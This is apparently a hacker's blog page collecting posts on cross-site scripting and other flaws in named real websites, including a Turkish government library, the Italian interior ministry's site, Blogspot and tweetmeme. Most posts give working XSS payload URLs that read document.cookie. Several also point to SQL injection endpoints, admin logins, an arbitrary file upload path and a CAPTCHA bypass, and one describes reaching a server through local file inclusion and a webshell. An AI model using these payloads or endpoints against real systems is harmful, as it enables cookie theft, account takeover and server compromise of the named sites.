Skip to main content

Posts

Showing posts with the label xss

primomaggio.com | XSS

POST http://www.primomaggio.com/newsletter.php POSTDATA nome=chick&cognome=chick&email=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3Echick%40mailinator.com&x=40&y=7&send=1 _____ An Sql injection was available in the login area of the forum of the previous website (in asp as far as I can remember).

kutuphane.tuik.gov.tr | data leak, system compromise, HTTP splitting, XSS.

-Data leak- http://kutuphane.tuik.gov.tr/yordambt/liste.php?-skip=0&-atla=0&-sayfa=01&Alan3=&Alan5=&anatur=&bolum=&alttur=&sekil=&ortam=&dil=&yayintarihi=&kgt=&gorsel=&kurumyayini=&cAlanlar=pollo&aa=eseradi&-max=16&universite=&enstitu=&anabilimdali=&bilimdali=&sureliilkharf=&sure=&biryil=&birdergitrh=&birsayi=&biricindekiler= we can see the full path within the errors -> C:\Inetpub\wwwroot\yordambt ex file: _dil.php | index.php | liste.php | _yardim.php | arama.php | anasayfa.php | url.php After getting access through a lfi it's possible to see that we are on a (windows) box with the default configuration, with the permissions for -everybody- in some important folders. It's possible to operate quite like an administrator with a simple -webshell- script There are some shared folders without password on other boxes ------ The scripts available from the web...

pigrecotechnology.it SQL Injection, XSS, nt system compromise

Sql Injection www.pigrecotechnology.it/Archivio/goRicerca.asp?tipologia=tesi Sql injection and XSS http://www.pigrecotechnology.it/Search/contRicerca.asp in the search form "><script>alert(document.cookie);</script><" XSS http://www.pigrecotechnology.it/riservata.asp?messaggio=%3CIMG%20SRC=%27vbscript:msgbox%28%22hello%22%29%27%3E useless CAPTCHA http://www.pigrecotechnology.it/riservata.asp You can get the captcha code (numbers) from the name of the images. It can be easily avoided by a very simple bot. It's just useless.

*Hack* google blogspot blogs via XSS

Google Blogspot, after the new look, is suffering of a bunch of strange XSSs. I've found them without doing anything .... just by publishing my old XSSs. The problem is in several part where you open the preview of the Themes (including the new one for the mobile). After doing a faster test I've noticed that it works also in the comments area, so, you can try to send a stored XSS and move the blogadmin like a puppet in the various functionalities. I've changed for *myself*  the layout, via XSS, without problems. Quite funny and ... problematic. (I'm not opening the comments for now ... and it's not a problem since they are just a few of them xD). I will not add more informations but it's so SIMPLE that you just need to copy/paste one of my latest posts, as is. I'm so lucky ... sometimes ... even if in an useless way.

http://www.ram-consulting.org - asp, XSS, Sql Injection, site access

XSS http://www.ram-consulting.org/registrazione_analisi2.asp SQL Injection http://www.ram-consulting.org/admin/index.php (admin access) http://www.ram-consulting.org/news_singola.asp http://www.ram-consulting.org/news_singola_print.asp http://www.ram-consulting.org/vai_news.asp Data tampering and manipulation is possible on the cookies.

Microgame casino people's tv calendario - info disclosure, XSS, flashvars xss

XSS (this one will also work after that the victim clicks on any link of the page) http://casino.peoples.it/?homeRealm=http://www.kpoker.it/&s=%22%3E%3Cvideo%20src=1%20onerror=alert%28String.fromCharCode%28112,97,115,115,101,100%29%29%20%3Ehttp://www.kpoker.it/ ----- http://www.tv.peoples.it/wp-content/themes/on-demand/ Fatal error: Call to undefined function get_header() in /var/www/vhosts/peoplespoker.tv/httpdocs/wp-content/themes/on-demand/index.php on line 1 ---- free info http://calendario.peoples.it/lepokerine/common/video_gallery.php?id=1 Notice: Use of undefined constant id - assumed 'id' in /var/www/vhosts/www.calendario.peoples.it/httpdocs/lepokerine/common/video_gallery.php on line 2 http://calendario.peoples.it/lepokerine/common/photo_gallery.php?id=1 Notice: Use of undefined constant id - assumed 'id' in /var/www/vhosts/www.calendario.peoples.it/httpdocs/lepokerine/common/photo_gallery.php on line 2 ---- XSS http://calendario.peo...

http://www.asiabenevento.it | xss, arbitrary file upload, sql injection, remote administration, root compromise

-XSS- http://www.asiabenevento.it/asiastrade/strade.php?vcercaStra=" onmouseover=alert("xss") bla=" http://www.asiabenevento.it/vedifoto.php?foto=immagini/ASIAalta.jpg&vDidascalia=&vTitolo=1%3Cscript%3Ealert%281%29;%3C/script%3E -sql inj- http://www.asiabenevento.it/asiastrade/strade.php -arbitrary file upload- http://www.asiabenevento.it/fckeditor/

gay.tv | XSS

gay.tv xss XSS (simple) - (old and ... *fixed*) http://www.gay.tv/aggregato.jsp?string=<script>alert(1);</script>&x=0&y=0 (new XSS) ---- http://www.gay.tv/search/?123%3Cscript%3Ealert%281%29;%3C/script%3E

http://tweetmeme.com | XSS

while subscribing to utest.com i've found this simple xss on twetmeme.com (a service that they use to tweet ... I suppose). funny .... ? XSS ( no checks/sanitizing ... nothing) http://tweetmeme.com/popup/option?url_id=984607153&source=utest&service=bit.ly.%22>%3Cvideo src=1 onerror=alert(document.cookie) > http://tweetmeme.com/popup/option?url_id=984607153&source=utest%22%3E%3Cvideo%20src=1%20onerror=alert(document.cookie)%20%3E&service=bit.ly http://tweetmeme.com/popup/option?url_id=984607153%22%3E%3Cvideo%20src=1%20onerror=alert(document.cookie)%20%3E&source=utest&service=bit.ly redirecting anywhere http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=135&nurl=http://www.google.com spammy http://blog.tweetmeme.com/?s=.&feed=Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc sit amet elit turpis. Cras elementum, turpis quis rutrum viverra, dui sapien auctor lorem, sed suscipit dui odio e...

www.interno.it | XSS

various characters are replaced but the xss is still possible and we can redirect the user where we want to. The xss is triggered by the onmouseover on the available images. In this case we send the user to google. XSS http://www.interno.it/mininterno/site/it/sezioni/sala_stampa/gallery/2010/0934_maroni_in_visita_al_cairo/index.html?month=5%22%20onmouseover=%22location.href='http://www.google.com'; same problem in other pages of the website http://www.interno.it/mininterno/site/it/sezioni/sala_stampa/gallery/2010/0934_maroni_in_visita_al_cairo/9.html?month=5%22%20onmouseover=%22location.href=%27http://www.google.com%27 Note: we can also change the stylesheet and do other things.This is just a sample.